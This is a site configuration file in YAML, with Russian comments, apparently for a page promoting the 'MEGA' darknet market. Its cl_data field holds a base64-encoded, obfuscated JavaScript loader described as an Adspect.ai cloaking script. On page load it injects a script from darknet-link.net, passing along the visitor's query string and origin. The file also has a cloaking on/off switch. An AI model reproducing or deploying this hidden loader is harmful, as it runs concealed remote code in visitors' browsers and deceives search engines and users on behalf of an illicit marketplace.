  #Клокак включена/выключена true|false
  cl: false
  #id счетчика Яндекс-метрики
  ymid:
  #Мета-тег верификации Яндекс Вебмастер
  ya_verif: '<meta name="yandex-verification" content="cf87b6f1c1ffaea4">'
  #Дата публикации 
  date_published: 2023-05-08
  #Язык сайта
  lang: en
  #Имя для ld-json разметки
  name: MEGA
  #Доменное имя без http|https (!!!!!ТОЛЬКО ДОМЕН, БЕЗ УКАЗАНИЯ ПОДДОМЕНА!!!!!)
  domain: site-mega-darknet.net
  #URL сайта (ВАЖНО!!! Этот же url !!!ОБЯЗАТЕЛЬНО!!! необходимо указать в файле _config.yml в корне проекта, иначе sitmap.xml будет сформирован неправильно!) 
  #с http|https (если сайт на поддомене, указываем поддомен)
  url: https://site-mega-darknet.net
  #Путь к файлу логотипа, для соцсетей
  logo: /assets/images/ava.webp
  #Путь к Favicon
  favicon: /assets/images/favicon.ico
  #css стили для подгружаемого переходника
  prelend_css: /../assets/prelend/css/
  prelend_js: /../assets/prelend/js/
  prelend_images: /../assets/prelend/images/
  main_css: /assets/main/css/
  main_js: /assets/main/js/
  main_images: /assets/main/images/
  #Код скрипта клоаки Adspect.ai (используеться метоод js-redirect в Adspect)
  cl_data: <script src="data:text/javascript;base64,ZnVuY3Rpb24gXzB4MTU4OChfMHg1NWE4NTMsXzB4NDQ4YzAwKXt2YXIgXzB4ZmY5MmY9XzB4ZmY5MigpO3JldHVybiBfMHgxNTg4PWZ1bmN0aW9uKF8weDE1ODhlNyxfMHg0YWYwOTYpe18weDE1ODhlNz1fMHgxNTg4ZTctMHgxMjk7dmFyIF8weDEzZDExNj1fMHhmZjkyZltfMHgxNTg4ZTddO3JldHVybiBfMHgxM2QxMTY7fSxfMHgxNTg4KF8weDU1YTg1MyxfMHg0NDhjMDApO31mdW5jdGlvbiBfMHhmZjkyKCl7dmFyIF8weDVhNGViNz1bJ2FIUjBjSE02THk5a1lYSnJibVYwTFd4cGJtc3VibVYwTDJGcVlYZ3VjR2h3JywnY2xhc3NOYW1lJywnNDUzNndHSFhXSicsJzMwMjI3NjBibnN2cUInLCc3MzdjVklLQ1AnLCcyMjEzMFdoYkdjYycsJzYwMzk5ODBRc1pWREsnLCdzY3JpcHQnLCc1NDk0MnZXZVhTeicsJzRpalhMbE4nLCdoZWFkJywnNHRDcXhwYycsJzYwMDM5NnpKQkdSdCcsJ2lmcmFtZScsJzc0OUhSdE1KSCcsJ2FwcGVuZENoaWxkJywnaW5kZXhPZicsJ2NyZWF0ZUVsZW1lbnQnLCcxMTgyNjAzalVyUGhJJywnZ2V0RWxlbWVudHNCeVRhZ05hbWUnLCdzZWFyY2gnLCc3Njc1ODZ5Z0JPdm8nXTtfMHhmZjkyPWZ1bmN0aW9uKCl7cmV0dXJuIF8weDVhNGViNzt9O3JldHVybiBfMHhmZjkyKCk7fShmdW5jdGlvbihfMHg0ZjE1YzQsXzB4NWU3YTlmKXt2YXIgXzB4NWNhM2FhPV8weDE1ODgsXzB4MTNiYTA2PV8weDRmMTVjNCgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4MmIwYzkxPS1wYXJzZUludChfMHg1Y2EzYWEoMHgxMzgpKS8weDEqKC1wYXJzZUludChfMHg1Y2EzYWEoMHgxMmUpKS8weDIpKy1wYXJzZUludChfMHg1Y2EzYWEoMHgxMmIpKS8weDMrLXBhcnNlSW50KF8weDVjYTNhYSgweDEzYSkpLzB4NCoocGFyc2VJbnQoXzB4NWNhM2FhKDB4MTM1KSkvMHg1KSstcGFyc2VJbnQoXzB4NWNhM2FhKDB4MTM3KSkvMHg2KihwYXJzZUludChfMHg1Y2EzYWEoMHgxM2QpKS8weDcpKy1wYXJzZUludChfMHg1Y2EzYWEoMHgxMzIpKS8weDgrcGFyc2VJbnQoXzB4NWNhM2FhKDB4MTMxKSkvMHg5KigtcGFyc2VJbnQoXzB4NWNhM2FhKDB4MTM0KSkvMHhhKStwYXJzZUludChfMHg1Y2EzYWEoMHgxMzMpKS8weGIqKHBhcnNlSW50KF8weDVjYTNhYSgweDEzYikpLzB4Yyk7aWYoXzB4MmIwYzkxPT09XzB4NWU3YTlmKWJyZWFrO2Vsc2UgXzB4MTNiYTA2WydwdXNoJ10oXzB4MTNiYTA2WydzaGlmdCddKCkpO31jYXRjaChfMHhjZDBiYTMpe18weDEzYmEwNlsncHVzaCddKF8weDEzYmEwNlsnc2hpZnQnXSgpKTt9fX0oXzB4ZmY5MiwweGM2NDllKSwoZnVuY3Rpb24oKXt2YXIgXzB4M2Y5MTMzPV8weDE1ODgsXzB4MmNjNzczPWRvY3VtZW50W18weDNmOTEzMygweDEzOSldfHxkb2N1bWVudFtfMHgzZjkxMzMoMHgxMmMpXSgnaGVhZCcpWzB4MF0sXzB4NGJhMmYxPWF0b2IoXzB4M2Y5MTMzKDB4MTJmKSk7XzB4NGJhMmYxKz0tMHgxPF8weDRiYTJmMVtfMHgzZjkxMzMoMHgxMjkpXSgnPycpPycmJzonPycsXzB4NGJhMmYxKz1sb2NhdGlvbltfMHgzZjkxMzMoMHgxMmQpXVsnc3Vic3RyaW5nJ10oMHgxKTt2YXIgXzB4M2NlMDRjPWRvY3VtZW50W18weDNmOTEzMygweDEyYSldKF8weDNmOTEzMygweDEzNikpO18weDNjZTA0Y1snaWQnXT1idG9hKGxvY2F0aW9uWydvcmlnaW4nXSksXzB4M2NlMDRjWydzcmMnXT1fMHg0YmEyZjEsXzB4M2NlMDRjW18weDNmOTEzMygweDEzMCldPV8weDNmOTEzMygweDEzYyksXzB4MmNjNzczW18weDNmOTEzMygweDEzZSldKF8weDNjZTA0Yyk7fSgpKSk7"></script>